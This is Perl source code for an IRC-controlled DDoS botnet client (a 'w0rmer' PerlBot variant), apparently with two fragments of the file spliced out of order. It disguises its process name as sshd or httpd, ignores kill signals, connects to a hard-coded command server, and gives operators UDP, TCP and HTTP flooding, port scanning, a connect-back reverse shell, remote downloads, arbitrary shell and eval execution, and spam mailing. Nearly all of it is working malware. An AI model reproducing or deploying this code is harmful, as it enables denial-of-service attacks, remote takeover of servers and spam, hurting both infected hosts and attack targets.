sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1w0rmer PerlBot Channel Help: ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1============================= ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1join <channel> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1part <channel> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12!9,1rejoin <channel> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12!9,1op <channel> <nick> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12!9,1deop <channel> <nick> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12!9,1voice <channel> <nick> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12!9,1devoice <channel> <nick> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12!9,1nick <newnick> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12!9,1msg <nick> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12!9,1quit ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12!9,1die ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1============================= ");
}
if ($funcarg =~ /^utils/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1================================================== ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1w0rmer PerlBot Utils Help: ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1================================================== ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1cback <ip> <port> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1download <url+path> <file> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1mail <subject> <sender> <recipient> <message> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1dns <ip> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1port <ip> <port> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1portscan <ip> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u pwd (for example) ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1================================================== ");
}
#########################
##### [ Functions ] #####
#########################
if ($funcarg =~ /^die/) {
sendraw($IRC_cur_socket, "QUIT :");
$killd = "kill -9 ".fork;
system (`$killd`);
}
###########
if ($funcarg =~ /^join (.*)/) {
sendraw($IRC_cur_socket, "JOIN ".$1);
}
if ($funcarg =~ /^part (.*)/) {
sendraw($IRC_cur_socket, "PART ".$1);
}
###########
if ($funcarg =~ /^portscan (.*)/) {
my $hostip="$1";
my @portas=("1","7","9","14","20","21","22","23","25","53","80","88","110","112","113","137","143","145","222","333","405","443","444","445","512","587","616","666","993","995","1024","1025","1080","1144","1156","1222","1230","1337","1348","1628","1641","1720","1723","1763","1983","1984","1985","1987","1988","1990","1994","2005","2020","2121","2200","2222","2223","2345","2360","2500","2727","3130","3128","3137","3129","3303","3306","3333","3389","4000","4001","4471","4877","5252","5522","5553","5554","5642","5777","5800","5801","5900","5901","6062","6550","6522","6600","6622","6662","6665","6666","6667","6969","7000","7979","8008","8080","8081","8082","8181","8246","8443","8520","8787","8855","8880","8989","9855","9865","9997","9999","10000","10001","10010","10222","11170","11306","11444","12241","12312","14534","14568","15951","17272","19635","19906","19900","20000","21412","21443","21205","22022","30999","31336","31337","32768","33180","35651","36666","37998","41114","41215","44544","45055","45555","45678","51114","51247","51234","55066","55555","65114","65156","65120","65410","65500","65501","65523","65533");
my (@aberta, %porta_banner);
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [PortScan] 9,1Scanning for open ports on 12".$1." 9,1started. ");
foreach my $porta (@portas) {
my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => 4);
if ($scansock) {
push (@aberta, $porta);
$scansock->close;
}
}
if (@aberta) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [PortScan] 9,1Open ports found: 12@aberta ");
} else {
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [PortScan] 9,1No open ports found. ");
}
}
##############
if ($funcarg =~ /^download\s+(.*)\s+(.*)/) {
getstore("$1", "$2");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Download] 9,1Downloaded the file: 12$2 9,1from 12$1 ");
}
##############
if ($funcarg =~ /^dns\s+(.*)/){
my $nsku = $1;
$mydns = inet_ntoa(inet_aton($nsku));
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [DNS] 9,1Resolved: 12$nsku 9,1to 12$mydns ");
}
##############
if ($funcarg=~ /^port\s+(.*?)\s+(.*)/ ) {
my $hostip= "$1";
my $portsc= "$2";
my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $portsc, Proto =>'tcp', Timeout => 7);
if ($scansock) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [PORT] 9,1Connection to 12$hostip9,1:12$portsc 9,1is 12Accepted. ");
}
else {
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [PORT] 9,1Connection to 12$hostip9,1:12$portsc 9,1is 4Refused. ");
}
}
##############
if ($funcarg =~ /^udp1\s+(.*)\s+(\d+)\s+(\d+)/) {
return unless $pacotes;
socket(Tr0x, PF_INET, SOCK_DGRAM, 17);
my $alvo=inet_aton("$1");
my $porta = "$2";
my $dtime = "$3";
my $pacote;
my $pacotese;
my $size = 0;
my $fim = time + $dtime;
my $pacota = 1;
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [UDP-1 w0rmer] 9,1Attacking 12".$1." 9,1On Port 12".$porta." 9,1for 12".$dtime." 9,1seconds. ");
while (($pacota == "1") && ($pacotes == "1")) {
$pacota = 0 if ((time >= $fim) && ($dtime != "0"));
$pacote = $size ? $size : int(rand(1024-64)+64) ;
$porta = int(rand 65000) +1 if ($porta == "0");
#send(Tr0x, 0, $pacote, sockaddr_in($porta, $alvo));
send(Tr0x, pack("a$pacote","Tr0x"), 0, pack_sockaddr_in($porta, $alvo));
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [UDP-1 w0rmer] 9,1Attack for 12".$1." 9,1finished in 12".$dtime." 9,1seconds9,1. ");
}
##############
if ($funcarg =~ /^udp2\s+(.*)\s+(\d+)\s+(\d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [UDP-2 w0rmer] 9,1Attacking 12".$1." 9,1with 12".$2." 9,1Kb Packets for 12".$3." 9,1seconds. ");
my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3");
$dtime = 1 if $dtime == 0;
my %bytes;
$bytes{igmp} = $2 * $pacotes{igmp};
$bytes{icmp} = $2 * $pacotes{icmp};
$bytes{o} = $2 * $pacotes{o};
$bytes{udp} = $2 * $pacotes{udp};
$bytes{tcp} = $2 * $pacotes{tcp};
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [UDP-2 w0rmer] 9,1Results 12".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." 9,1Kb in 12".$dtime." 9,1seconds to 12".$1."9,1. ");
}
##############
if ($funcarg =~ /^udp3\s+(.*)\s+(\d+)\s+(\d+)/) {
return unless $pacotes;
socket(Tr0x, PF_INET, SOCK_DGRAM, 17);
my $alvo=inet_aton("$1");
my $porta = "$2";
my $dtime = "$3";
my $pacote;
my $pacotese;
my $fim = time + $dtime;
my $pacota = 1;
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [UDP-3 w0rmer] 9,1Attacking 12".$1." 9,1On Port 12".$porta." 9,1for 12".$dtime." 9,1seconds. ");
while (($pacota == "1") && ($pacotes == "1")) {
$pacota = 0 if ((time >= $fim) && ($dtime != "0"));
$pacote= $rand x $rand x $rand;
$porta = int(rand 65000) +1 if ($porta == "0");
send(Tr0x, 0, $pacote, sockaddr_in($porta, $alvo)) and $pacotese++ if ($pacotes == "1");
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [UDP-3 w0rmer] 9,1Results 12".$pacotese." 9,1Kb in 12".$dtime." 9,1seconds to 12".$1."9,1. ");
}
##############
##############
if ($funcarg =~ /^tcp\s+(.*)\s+(\d+)\s+(\d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [TCP w0rmer] 9,1Attacking 12".$1.":".$2." 9,1for 12".$3." 9,1seconds. ");
my $itime = time;
my ($cur_time);
$cur_time = time - $itime;
while ($3>$cur_time){
$cur_time = time - $itime;
&tcpflooder("$1","$2","$3");
}
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [TCP w0rmer] 9,1Attack ended on: 12".$1.":".$2."9,1. ");
}
##############
if ($funcarg =~ /^http\s+(.*)\s+(\d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1[HTTP w0rmer] 9,1Attacking 12".$1." 9,1on port 80 for 12".$2." 9,1seconds. ");
my $itime = time;
my ($cur_time);
$cur_time = time - $itime;
while ($2>$cur_time){
$cur_time = time - $itime;
my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80);
print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n";
close($socket);
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [HTTP w0rmer] 9,1Attacking ended on: 12".$1."9,1. ");
}
##############
if ($funcarg =~ /^cback\s+(.*)\s+(\d+)/) {
my $host = "$1";
my $port = "$2";
my $proto = getprotobyname('tcp');
my $iaddr = inet_aton($host);
my $paddr = sockaddr_in($port, $iaddr);
my $shell = "/bin/sh -i";
if ($^O eq "MSWin32") {
$shell = "cmd.exe";
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [ConnectBack] 9,1Connecting to 12$host:$port ");
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
connect(SOCKET, $paddr) or die "connect: $!";
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system("$shell");
close(STDIN);
close(STDOUT);
close(STDERR);
}
##############
if ($funcarg =~ /^mail\s+(.*)\s+(.*)\s+(.*)\s+(.*)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Mailer] 9,1Sending email to: 12$3 ");
$subject = $1;
$sender = $2;
$recipient = $3;
@corpo = $4;
$mailtype = "content-type: text/html";
$sendmail = '/usr/sbin/sendmail';
open (SENDMAIL, "| $sendmail -t");
print SENDMAIL "$mailtype\n";
print SENDMAIL "Subject: $subject\n";
print SENDMAIL "From: $sender\n";
print SENDMAIL "To: $recipient\n\n";
print SENDMAIL "@corpo\n\n";
close (SENDMAIL);
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Mailer] 9,1Email Sended to: 12$recipient ");
}
exit;
}
}
##############
if ($funcarg =~ /^ctcpflood (.*)/) {
my $target = "$1";
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [IRCFlood] 9,1CTCP Flooding: 12".$target." ");
for (1..10) {
sendraw($IRC_cur_socket, "PRIVMSG ".$target." :\001VERSION\001\n");
sendraw($IRC_cur_socket, "PRIVMSG ".$target." :\001PING\001\n");
}
}
##############
if ($funcarg =~ /^msgflood (.*)/) {
my $target = "$1";
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [IRCFlood] 9,1MSG Flooding: 12".$target." ");
sendraw($IRC_cur_socket, "PRIVMSG ".$target." :0,15...1,16...2,13...3,12...4,11...5,10...6,9...7,8...8,7...9,6....0,15...1,16...2,13...3,12...4,11...5,10...6,9...7,8...8,7...9,6....0,15...1,16...2,13...3,12...4,11...5,10...6,9...7,8...8,7...9,6....0,15...1,16...2,13...3,12...4,11...5,10...6,9...7,8...");
}
##############
if ($funcarg =~ /^noticeflood (.*)/) {
my $target = "$1";
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [IRCFlood] 9,1NOTICE Flooding: 12".$target." ");
for (1..2){
sendraw($IRC_cur_socket, "NOTICE ".$target." :0,15...1,16...2,13...3,12...4,11...5,10...6,9...7,8...8,7...9,6....0,15...1,16...2,13...3,12...4,11...5,10...6,9...7,8...8,7...9,6....0,15...1,16...2,13...3,12...4,11...5,10...6,9...7,8...8,7...9,6....0,15...1,16...2,13...3,12...4,11...5,10...6,9...7,8...");
}
}
##############
##############
sub ircase {
my ($kem, $printl, $case) = @_;
if ($case =~ /^join (.*)/) {
j("$1");
}
elsif ($case =~ /^part (.*)/) {
p("$1");
}
elsif ($case =~ /^rejoin\s+(.*)/) {
my $chan = $1;
if ($chan =~ /^(\d+) (.*)/) {
for (my $ca = 1; $ca <= $1; $ca++ ) {
p("$2");
j("$2");
}
} else {
p("$chan");
j("$chan");
}
}
elsif ($case =~ /^op/) {
op("$printl", "$kem") if $case eq "op";
my $oarg = substr($case, 3);
op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
elsif ($case =~ /^deop/) {
deop("$printl", "$kem") if $case eq "deop";
my $oarg = substr($case, 5);
deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
elsif ($case =~ /^voice/) {
voice("$printl", "$kem") if $case eq "voice";
$oarg = substr($case, 6);
voice("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
elsif ($case =~ /^devoice/) {
devoice("$printl", "$kem") if $case eq "devoice";
$oarg = substr($case, 8);
devoice("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
elsif ($case =~ /^msg\s+(\S+) (.*)/) {
msg("$1", "$2");
}
elsif ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
for (my $cf = 1; $cf <= $1; $cf++) {
msg("$2", "$3");
}
}
elsif ($case =~ /^ctcp\s+(\S+) (.*)/) {
ctcp("$1", "$2");
}
elsif ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
for (my $cf = 1; $cf <= $1; $cf++) {
ctcp("$2", "$3");
}
}
elsif ($case =~ /^invite\s+(\S+) (.*)/) {
invite("$1", "$2");
}
elsif ($case =~ /^newerver\s+(\S+)\s+(\S+)/) {
conectar("$2", "$1", "6667");
}
elsif ($case =~ /^nick (.*)/) {
nick("$1");
}
elsif ($case =~ /^raw (.*)/) {
sendraw("$1");
}
elsif ($case =~ /^eval (.*)/) {
eval "$1";
}
elsif ($case =~ /^join\s+(\S+)\s+(\d+)/) {
sleep int(rand($2));
j("$1");
}
elsif ($case =~ /^part\s+(\S+)\s+(\d+)/) {
sleep int(rand($2));
p("$1");
}
elsif ($case =~ /^quit/) {
quit();
}
}
##############
sub shell {
my $printl=$_[0];
my $comando=$_[1];
if ($comando =~ /cd (.*)/) {
chdir("$1") || msg("$printl", "No such file or directory");
return;
} elsif ($pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {
my @resp=`$comando 2>&1 3>&1`;
my $c=0;
foreach my $linha (@resp) {
$c++;
chop $linha;
sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
if ($c == "$linas_max") {
$c=0;
sleep $sleep;
}
}
exit;
}
}
}
##############
sub udpflooder {
my $iaddr = inet_aton($_[0]);
my $msg = 'A' x $_[1];
my $ftime = $_[2];
my $cp = 0;
my (%pacotes);
$pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;
socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
return(undef) if $cp == 4;
my $itime = time;
my ($cur_time);
while ( 1 ) {
for (my $port = 1;
$port <= 65000; $port++) {
$cur_time = time - $itime;
last if $cur_time >= $ftime;
send(SOCK1, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{igmp}++;
send(SOCK2, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{udp}++;
send(SOCK3, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{icmp}++;
send(SOCK4, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{tcp}++;
for (my $pc = 3;
$pc <= 255;$pc++) {
next if $pc == 6;
$cur_time = time - $itime;
last if $cur_time >= $ftime;
socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
send(SOCK5, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{o}++;
}
}
last if $cur_time >= $ftime;
}
return($cur_time, %pacotes);
}
##############
sub tcpflooder {
my $itime = time;
my ($cur_time);
my ($ia,$pa,$proto,$j,$l,$t);
$ia=inet_aton($_[0]);
$pa=sockaddr_in($_[1],$ia);
$ftime=$_[2];
$proto=getprotobyname('tcp');
$j=0;$l=0;
$cur_time = time - $itime;
while ($l<1000){
$cur_time = time - $itime;
last if $cur_time >= $ftime;
$t="SOCK$l";
socket($t,PF_INET,SOCK_STREAM,$proto);
connect($t,$pa)||$j--;
$j++;$l++;
}
$l=0;
while ($l<1000){
$cur_time = time - $itime;
last if $cur_time >= $ftime;
$t="SOCK$l";
shutdown($t,2);
$l++;
}
}
##############
sub msg {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :$_[1]");
}
sub ctcp {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :\001$_[1]\001");
}
sub notice {
return unless $#_ == 1;
sendraw("NOTICE $_[0] :$_[1]");
}
sub op {
return unless $#_ == 1;
sendraw("MODE $_[0] +o $_[1]");
}
sub deop {
return unless $#_ == 1;
sendraw("MODE $_[0] -o $_[1]");
}
sub voice {
return unless $#_ == 1;
sendraw("MODE $_[0] +v $_[1]");
}
sub devoice {
return unless $#_ == 1;
sendraw("MODE $_[0] -v $_[1]");
}
sub j { &join(@_); }
sub join {
return unless $#_ == 0;
sendraw("JOIN $_[0]");
}
sub p { part(@_); }
sub part {sendraw("PART $_[0]");}
sub nick {
return unless $#_ == 0;
sendraw("NICK $_[0]");
}
sub quit {
sendraw("QUIT :$_[0]");
exit;
}
sub modo {
return unless $#_ == 0;
sendraw("MODE $_[0] $_[1]");
}
sub mode { modo(@_); }
sub invite {
return unless $#_ == 1;
sendraw("INVITE $_[1] $_[0]");
}
sub topico {
return unless $#_ == 1;
sendraw("TOPIC $_[0] $_[1]");
}
sub topic { topico(@_); }
sub away {
sendraw("AWAY $_[0]");
}
sub back { away(); }
}
###################
##### [ EOF ] #####
###################
#!/usr/bin/perl
system("echo INFECTED");
######################################################################################################################
######################################################################################################################
## DDoS Perl IrcBot v1.0 / 2012 by w0rmer Security Team ## [ Help ] #########################################
## Stealth MultiFunctional IrcBot writen in Perl #######################################################
## Teste on every system with PERL instlled ## !u @system ##
## ## !u @version ##
## This is a free program used on your own risk. ## !u @channel ##
## Created for educational purpose only. ## !u @flood ##
## I'm not responsible for the illegal use of this program. ## !u @utils ##
######################################################################################################################
## [ Channel ] #################### [ Flood ] ################################## [ Utils ] ###########################
######################################################################################################################
## !u @join <#channel> ## !u @udp1 <ip> <port> <time> ## !u @cback <ip> <port> ##
## !u @part <#channel> ## !u @udp2 <ip> <packet size> <time> ## !u @downlod <url+path> <file> ##
## !u !uejoin <#channel> ## !u @udp3 <ip> <port> <time> ## !u @portscan <ip> ##
## !u !op <channel> <nick> ## !u @tcp <ip> <port> <packet size> <time> ## !u @mail <subject> <sender> ##
## !u !deop <channel> <nick> ## !u @http <site> <time> ## <recipient> <message> ##
## !u !voice <channel> <nick> ## ## !u pwd;uname -a;id <for example> ##
## !u !devoice <channel> <nick> ## !u @ctcpflood <nick> ## !u @port <ip> <port> ##
## !u !nick <newnick> ## !u @msgflood <nick> ## !u @dns <ip/host> ##
## !u !msg <nick> ## !u @noticeflood <nick> ## ##
## !u !quit ## ## ##
## !u !uaw ## ## ##
## !u @die ## ## ##
## ## ## ##
######################################################################################################################
######################################################################################################################
#############################
##### [ Configuration ] #####
#############################
my @rps = ("/usr/local/apache/bin/httpd -DSSL",
"/usr/sbin/httpd -k start -DSSL",
"/usr/sbin/httpd",
"/usr/sbin/sshd -i",
"/usr/sbin/sshd",
"/usr/sbin/sshd -D",
"/usr/sbin/apache2 -k start",
"/sbin/syslogd",
"/sbin/klogd -c 1 -x -x",
"/usr/sbin/acpid",
"/usr/sbin/cron");
my $process = $rps[rand scalar @rps];
my @rversion = ("James ®");
my $vers = $rversion[rand scalar @rversion];
my @rircname = ("infected");
my $ircname = $rircname[rand scalar @rircname];
chop (my $realname = $rircname[rand scalar @rircname]);
my $nick =$rircname[rand scalar @rircname];
$server = '104.248.171.242' unless $server;
my $port = '6666';
my $linas_max='8';
my $sleep='5';
my $homedir = "/tmp";
my $version = 'irc bot by James ®';
my @admins = ("Nite","Nite1","Nite2");
my @hostauth = ("Nite");
my @channels = ("#sex");
my $pacotes = 1;
#################################################################
##### [ Stop Editing if you dont know what are you doing. ] #####
#################################################################
$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';
use Socket;
use IO::Socket;
use IO::Socket::INET;
use IO::Select;
chdir("$homedir");
$server="$ARGV[0]" if $ARGV[0];
$0="$process"."\0"x16;;
my $pid=fork;
exit if $pid;
die "Can't fork in background: $!" unless defined($pid);
our %irc_servers;
our %DCC;
my $dcc_sel = new IO::Select->new();
$sel_cliente = IO::Select->new();
sub sendraw {
if ($#_ == '1') {
my $socket = $_[0];
print $socket "$_[1]\n";
} else {
print $IRC_cur_socket "$_[0]\n";
}
}
sub getstore ($$)
{
my $url = shift;
my $file = shift;
$http_stream_out = 1;
open(GET_OUTFILE, "> $file");
%http_loop_check = ();
_get($url);
close GET_OUTFILE;
return $main::http_get_result;
}
sub _get
{
my $url = shift;
my $proxy = "";
grep {(lc($_) eq "http_proxy") && ($proxy = $ENV{$_})} keys %ENV;
if (($proxy eq "") && $url =~ m,^http://([^/:]+)(?::(\d+))?(/\S*)?$,) {
my $host = $1;
my $port = $2 || 80;
my $path = $3;
$path = "/" unless defined($path);
return _trivial_http_get($host, $port, $path);
} elsif ($proxy =~ m,^http://([^/:]+):(\d+)(/\S*)?$,) {
my $host = $1;
my $port = $2;
my $path = $url;
return _trivial_http_get($host, $port, $path);
} else {
return undef;
}
}
sub _trivial_http_get
{
my($host, $port, $path) = @_;
my($AGENT, $VERSION, $p);
$AGENT = "get-minimal";
$VERSION = "20000118";
$path =~ s/ /%20/g;
require IO::Socket;
local($^W) = 0;
my $sock = IO::Socket::INET->new(PeerAddr => $host,
PeerPort => $port,
Proto => 'tcp',
Timeout => 60) || return;
$sock->autoflush;
my $netloc = $host;
$netloc .= ":$port" if $port != 80;
my $request = "GET $path HTTP/1.0\015\012"
. "Host: $netloc\015\012"
. "User-Agent: $AGENT/$VERSION/u\015\012";
$request .= "Pragma: no-cache\015\012" if ($main::http_no_cache);
$request .= "\015\012";
print $sock $request;
my $buf = "";
my $n;
my $b1 = "";
while ($n = sysread($sock, $buf, 8*1024, length($buf))) {
if ($b1 eq "") {
$b1 = $buf;
$buf =~ s/.+?\015?\012\015?\012//s;
}
if ($http_stream_out) { print GET_OUTFILE $buf; $buf = ""; }
}
return undef unless defined($n);
$main::http_get_result = 200;
if ($b1 =~ m,^HTTP/\d+\.\d+\s+(\d+)[^\012]*\012,) {
$main::http_get_result = $1;
if ($main::http_get_result =~ /^30[1237]/ && $b1 =~ /\012Location:\s*(\S+)/) {
my $url = $1;
return undef if $http_loop_check{$url}++;
return _get($url);
}
return undef unless $main::http_get_result =~ /^2/;
}
return $buf;
}
sub conectar {
my $meunick = $_[0];
my $server_con = $_[1];
my $port_con = $_[2];
my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$server_con",
PeerPort=>$port_con) or return(1);
if (defined($IRC_socket)) {
$IRC_cur_socket = $IRC_socket;
$IRC_socket->autoflush(1);
$sel_cliente->add($IRC_socket);
$irc_servers{$IRC_cur_socket}{'host'} = "$server_con";
$irc_servers{$IRC_cur_socket}{'port'} = "$port_con";
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
$irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
nick("$meunick");
sendraw("USER $ircname ".$IRC_socket->sockhost." $server_con :$realname");
sleep 1;
}
}
my $line_temp;
while( 1 ) {
while (!(keys(%irc_servers))) { conectar("$nick", "$server", "$port"); }
delete($irc_servers{''}) if (defined($irc_servers{''}));
my @ready = $sel_cliente->can_read(0);
next unless(@ready);
foreach $fh (@ready) {
$IRC_cur_socket = $fh;
$meunick = $irc_servers{$IRC_cur_socket}{'nick'};
$nread = sysread($fh, $msg, 4096);
if ($nread == 0) {
$sel_cliente->remove($fh);
$fh->close;
delete($irc_servers{$fh});
}
@lines = split (/\n/, $msg);
for(my $c=0; $c<= $#lines; $c++) {
$line = $lines[$c];
$line=$line_temp.$line if ($line_temp);
$line_temp='';
$line =~ s/\r$//;
unless ($c == $#lines) {
parse("$line");
} else {
if ($#lines == 0) {
parse("$line");
} elsif ($lines[$c] =~ /\r$/) {
parse("$line");
} elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
parse("$line");
} else {
$line_temp = $line;
}
}
}
}
}
sub parse {
my $servarg = shift;
if ($servarg =~ /^PING \:(.*)/) {
sendraw("PONG :$1");
} elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
if ($args =~ /^\001VERSION\001$/) {
notice("$pn", "".$vers."");
}
if (grep {$_ =~ /^\Q$hostmask\E$/i } @hostauth) {
if (grep {$_ =~ /^\Q$pn\E$/i } @admins ) {
if ($onde eq "$meunick"){
shell("$pn", "$args");
}
if ($args =~ /^(\Q$meunick\E|\!u)\s+(.*)/ ) {
my $natrix = $1;
my $arg = $2;
if ($arg =~ /^\!(.*)/) {
ircase("$pn","$onde","$1");
} elsif ($arg =~ /^\@(.*)/) {
$ondep = $onde;
$ondep = $pn if $onde eq $meunick;
bfunc("$ondep","$1");
} else {
shell("$onde", "$arg");
}
}
}
}
}
elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
if (lc($1) eq lc($meunick)) {
$meunick=$4;
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
}
} elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
nick("$meunick-".int rand(9999));
} elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
$meunick = $2;
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
$irc_servers{$IRC_cur_socket}{'nome'} = "$1";
foreach my $canal (@channels) {
sendraw("MODE $nick +iw");
sendraw("JOIN $canal");
sendraw("PRIVMSG $canal :=> perl irc bot by James has forked successfully!");
}
}
}
sub bfunc {
my $printl = $_[0];
my $funcarg = $_[1];
if (my $pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {
###########################
##### [ Help Module ] #####
###########################
if ($funcarg =~ /^help/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1======================= ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1w0rmer PerlBot Main Help: ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1======================= ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1system ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1version ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1channel ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1flood ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1utils ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1======================= ");
}
if ($funcarg =~ /^system/) {
$uptime=`uptime`;
$ownd=`pwd`;
$id=`id`;
$uname=`uname -srp`;
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [System] 9,1=================== ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [System] 9,1Bot Configuration: ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [System] 9,1=================== ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [System] 9,1*Server : 12$server ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [System] 9,1*Port : 12$port ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [System] 9,1*Channels : 12@channels ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [System] 9,1*uname -a : 12$uname ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [System] 9,1*uptime : 12$uptime ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [System] 9,1*FakeProcess : 12$process ");
